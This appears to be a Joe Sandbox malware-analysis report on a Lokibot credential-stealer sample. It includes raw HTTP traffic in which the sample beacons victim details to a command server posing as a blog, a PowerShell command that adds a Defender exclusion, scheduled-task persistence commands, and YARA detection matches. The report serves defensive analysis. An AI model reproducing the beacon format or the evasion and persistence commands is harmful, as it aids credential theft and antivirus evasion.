                                              Apr 26, 2024 04:57:29.217364073 CEST | 59 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:29.218043089 CEST | 5 | IN | Data Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 26, 2024 04:57:29.218125105 CEST | 6 | IN | Data Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 26, 2024 04:57:29.218283892 CEST | 71 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:29.228532076 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:29.229114056 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:29.229190111 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:29.229394913 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:29.229522943 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.4 | 49757 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Apr 26, 2024 04:57:29.559161901 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:29.746954918 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:30.692130089 CEST | 59 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:30.692235947 CEST | 82 | IN | Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:30.710560083 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:30.710963964 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:30.711483955 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:30.711704969 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:30.711745977 CEST | 1289 | IN | Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 26, 2024 04:57:30.711783886 CEST | 670 | IN | Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 26, 2024 04:57:30.879601955 CEST | 1289 | IN | Data Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 0a
                                              Data Ascii: <style id='wp-block-site-title-inline-css'>.wp-block-site-title a{color:inherit}</style><style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;
                                              Apr 26, 2024 04:57:30.899617910 CEST | 215 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:29 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.4 | 49758 | 45.77.223.48 | 80 | 7328 | C:\Users\user\Desktop\gunzipped.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Apr 26, 2024 04:57:31.331813097 CEST | 238 | OUT | POST /~blog/?ajax=a HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: 8425B4CA
                                              Content-Length: 149
                                              Connection: close
                                              Apr 26, 2024 04:57:31.520076036 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones528110JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 26, 2024 04:57:32.388147116 CEST | 215 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 26 Apr 2024 02:57:31 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 26, 2024 04:57:32.388205051 CEST | 59 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 26, 2024 04:57:32.388237953 CEST | 11 | IN | Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: UTF-8" />
                                              Apr 26, 2024 04:57:32.388273001 CEST | 71 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 26, 2024 04:57:32.396579981 CEST | 57 | IN | Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 26, 2024 04:57:32.396946907 CEST | 32 | IN | Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 26, 2024 04:57:32.397033930 CEST | 134 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 26, 2024 04:57:32.397167921 CEST | 152 | IN | Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 26, 2024 04:57:32.397382975 CEST | 1289 | IN | Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 26, 2024 04:57:32.397422075 CEST | 1289 | IN | Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                              Target ID:0
                                              Start time:04:57:03
                                              Start date:26/04/2024
                                              Path:C:\Users\user\Desktop\gunzipped.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\gunzipped.exe"
                                              Imagebase:0x8d0000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1735179615.0000000003D49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1735179615.00000000047D9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1739547290.00000000076C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1735179615.00000000047F3000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1734483574.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe"
                                              Imagebase:0x40000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp510D.tmp"
                                              Imagebase:0x2b0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Users\user\Desktop\gunzipped.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\gunzipped.exe"
                                              Imagebase:0x3f0000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:7
                                              Start time:04:57:05
                                              Start date:26/04/2024
                                              Path:C:\Users\user\Desktop\gunzipped.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\gunzipped.exe"
                                              Imagebase:0x400000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000007.00000002.1966713417.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:8
                                              Start time:04:57:06
                                              Start date:26/04/2024
                                              Path:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\mPvIOxEZXJsdYp.exe
                                              Imagebase:0x9c0000
                                              File size:705'032 bytes
                                              MD5 hash:4B905E6548F4D5040FAB8962CB71877E
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.1765632980.0000000004A2C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.1765632980.0000000004A46000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.1763912656.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 18%, ReversingLabs
• Detection: 32%, Virustotal
                                              Reputation:low
                                              Has exited:true

                                              Target ID:9
                                              Start time:04:57:06
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff693ab0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:04:57:08
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mPvIOxEZXJsdYp" /XML "C:\Users\user\AppData\Local\Temp\tmp5B1F.tmp"
                                              Imagebase:0x2b0000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:04:57:08
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:04:57:08
                                              Start date:26/04/2024
